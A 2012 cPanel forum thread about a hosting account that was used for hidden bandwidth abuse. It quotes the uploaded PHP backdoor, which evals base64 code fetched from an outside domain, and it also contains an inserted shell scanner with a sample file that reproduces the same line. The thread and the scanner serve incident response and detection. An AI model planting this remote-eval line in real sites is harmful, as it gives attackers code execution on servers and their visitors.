The Community Forums


account hacked

Discussion in 'Security' started by domz, Apr 25, 2012.

  1. domz

    domz Registered

    Joined:
    Apr 25, 2012
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    I had a user register; after about a month of use, we found out he was pulling 5TB of bandwidth a month and CPANEL WAS reporting he had used 0 GB.

    He had one php document with this in it:
    Code:
    <?eval(@base64_decode(@file_get_contents("http://ba.d.s.ite.was.here..com/stream.php?a=".$_SERVER['REMOTE_ADDR']."&".$_SERVER['QUERY_STRING'])));?>
     
  2. domz

    domz Registered

    Joined:
    Apr 25, 2012
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    He owns that website noobroom. Here are his details:
    -removed-
     
    #2 domz, Apr 25, 2012
    Last edited by a moderator: Apr 25, 2012
  3. NetMantis

    NetMantis BANNED

    Joined:
    Apr 22, 2012
    Messages:
    117
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Utah
    cPanel Access Level:
    DataCenter Provider
    There are a number of ways that can happen, but it illustrates why you need to have good, proper security in place.

    1. The user's computer at home may have been infected with a virus and a hacker uploaded the files

    2. Much more likely to be the case, a vulnerable web program was exploited using a known security hole for code injection

    (This incidentally is exactly the reason to make sure all web programs on all hosting accounts are kept updated
    with the latest and newest updates and security patches)

    There is also a very good chance that once one was placed, you have others on other web sites unless you have hardened against cross site scripting, but I'd take a fair guess you don't have that kind of protection, so it would be a very good idea to go ahead and scan and check all the other websites on your server for similar compromises.

    PS: as a matter of security, you might want to censor the domain name in the eval line you posted (i.e. *****.com)
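One way to do the server-wide sweep recommended above, as an added example that is not part of the thread or of cPanel: a grep for the exact shape of the quoted backdoor (remote content fed through base64_decode into eval), plus a list of the hosts the hits call home to. It assumes GNU find/grep/sed as on a typical cPanel box; the sample tree and the domain example.invalid are constructed here.

```shell
#!/bin/sh
# Added example, not code from the thread. Flags PHP files that eval() code
# fetched from a remote URL, the pattern of the backdoor quoted above.
# Assumes GNU find/grep/sed (as on a typical cPanel/Linux host).

# eval( base64_decode( file_get_contents( "http:// with optional whitespace
# and @ error-suppression, matching the quoted sample exactly.
REMOTE_EVAL_PATTERN="eval[[:space:]]*\([[:space:]]*@?base64_decode[[:space:]]*\([[:space:]]*@?file_get_contents[[:space:]]*\([[:space:]]*@?[\"']https?://"

# Print file:line:match for every hit under $1; return 1 if any hit, 0 if clean.
scan_remote_eval() {
    # /dev/null forces grep to print the file name even for a single file.
    hits=$(find "$1" -type f -name '*.php' \
        -exec grep -En "$REMOTE_EVAL_PATTERN" /dev/null {} + 2>/dev/null) || true
    [ -n "$hits" ] || return 0
    printf '%s\n' "$hits"
    return 1
}

# Unique remote hosts the flagged files pull code from, for review, egress
# blocking in the firewall, and searching the other accounts on the box.
remote_eval_hosts() {
    scan_remote_eval "$1" \
        | grep -Eo "https?://[^/\"']+" \
        | sed -E 's#^https?://##' \
        | sort -u
}

# Constructed sample tree: one backdoored file (same shape as the quoted line,
# placeholder domain) and one clean file, so the scan can be run offline.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/site1/public_html" "$d/site2/public_html"
    cat > "$d/site1/public_html/x.php" <<'EOF'
<?eval(@base64_decode(@file_get_contents("http://example.invalid/stream.php?a=".$_SERVER['REMOTE_ADDR']."&".$_SERVER['QUERY_STRING'])));?>
EOF
    cat > "$d/site2/public_html/index.php" <<'EOF'
<?php echo "hello"; ?>
EOF
    printf '%s\n' "$d"
}

# Stand-alone run: ./scan.sh --demo scans the constructed tree. On a real
# server, call scan_remote_eval /home instead.
if [ "${1:-}" = "--demo" ]; then
    tree=$(make_sample_tree)
    scan_remote_eval "$tree" || echo "remote-eval backdoor(s) found; hosts:"
    remote_eval_hosts "$tree"
    rm -rf "$tree"
fi
```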
     
  4. Ivan@rh

    Ivan@rh Member

    Joined:
    Apr 23, 2012
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    You need a good upload scanner to prevent malicious code injection. Check cxs by configserver.com. It is commercial software, a $50US one-off fee, but it is good against this type of attack.
     
  5. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    While we appreciate you trying to be helpful, this is a technical forum and it's important to read and understand the OP's post you are answering.

    In his post, he said that the user had uploaded a single encrypted file which was then loading files from another server.

    What I'm curious about is why cPanel didn't pick up the bandwidth usage - did none of the used bandwidth leave the machine?

    I guess the other question is how something like CSF could be used - if even possible - to restrict this sort of behaviour?

    ... and this was an excellent point :)
     
  6. NetMantis

    NetMantis BANNED

    Joined:
    Apr 22, 2012
    Messages:
    117
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Utah
    cPanel Access Level:
    DataCenter Provider
    I find cPanel's bandwidth tracking is a bit weak and lacking in accuracy.

    Just a few generalized points and observations on the topic and a few helpful tips:

    cPanel usually only tracks standard activities like web page views, email as long as it's through normal SMTP type channels with the correct username, etc. I find that as a whole, cPanel actually misses quite a lot, and I have seen many times where cPanel's logs and account bandwidth tracker failed to log items that they should have caught. The programmers probably didn't have hacking or other such unusual circumstances in mind when they wrote those programs.

    Bottom line is I would not rely on cPanel's usage reports to tell you these things, and then regarding the mention of LFD, it's possible the user also did not configure CSF / LFD to track those types of events either, as that does take a little bit of configuring to set up.

    There are several telltale signs to know when something like this is happening even without the logs or security reports, and that is just simply watching the load levels of the server and the size of the eximstats database and mail queues, or even just simply taking note of the size of the /var/log/exim_mainlog file compared against its average size from any other week.

    If you suddenly see a rise in server loads or a continuous jump up in mail processing, that's a good indication that you need to probably at the very least take a closer look at what is going on in the server, because there is a fair chance someone is doing something they shouldn't be doing.

    Another item to keep a regular eye on: almost all web server providers, whether that be dedicated or VPS of any type, usually have some sort of traffic or bandwidth usage monitoring system in place, set up mainly so the hosting provider knows whether to charge you for over usage. That same interface from the server provider is often more accurate than cPanel's bandwidth tracking, so if you find the numbers your server provider reports very different from what cPanel reports, that's another good reason to go look deeper at what is happening on the server and find out what is going on behind the scenes.

    Brianoz, as you pointed out, CSF / LFD does have within it everything that is needed to keep a watchful eye out for unusually high activity or usage surges, and I would recommend everyone use those features. Unfortunately that part of LFD is not turned on by default, and many people won't take the time to read through the "csf.conf" file or really configure it to its fullest capabilities, but to those who do, kudos to you, because it's well worth the time to set up those extra features to be able to keep a better watchful eye on what is happening in your server.

    Bottom line to everyone pulling all the above points together is just simply always be observant and watch out for unusual changes in your server loads, traffic, or mail queues. If you suddenly get more activity than usual, then at the very least you should check it out immediately and not sit around for a few weeks or a month for someone to tell you later you have been hacked. Anyone keeping a close eye on the activity of their own server should be able to tell when there is something unusual happening.

    Okay well that's my 2 cents on those issues for the evening if it helps anyone out there. :D
     
    #6 NetMantis, Apr 29, 2012
    Last edited: Apr 29, 2012
  7. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    Definitely turn on the SMTP_BLOCK and probably SMTP_LOCAL on your server - without it, hackers can anonymously send spam from the server.
     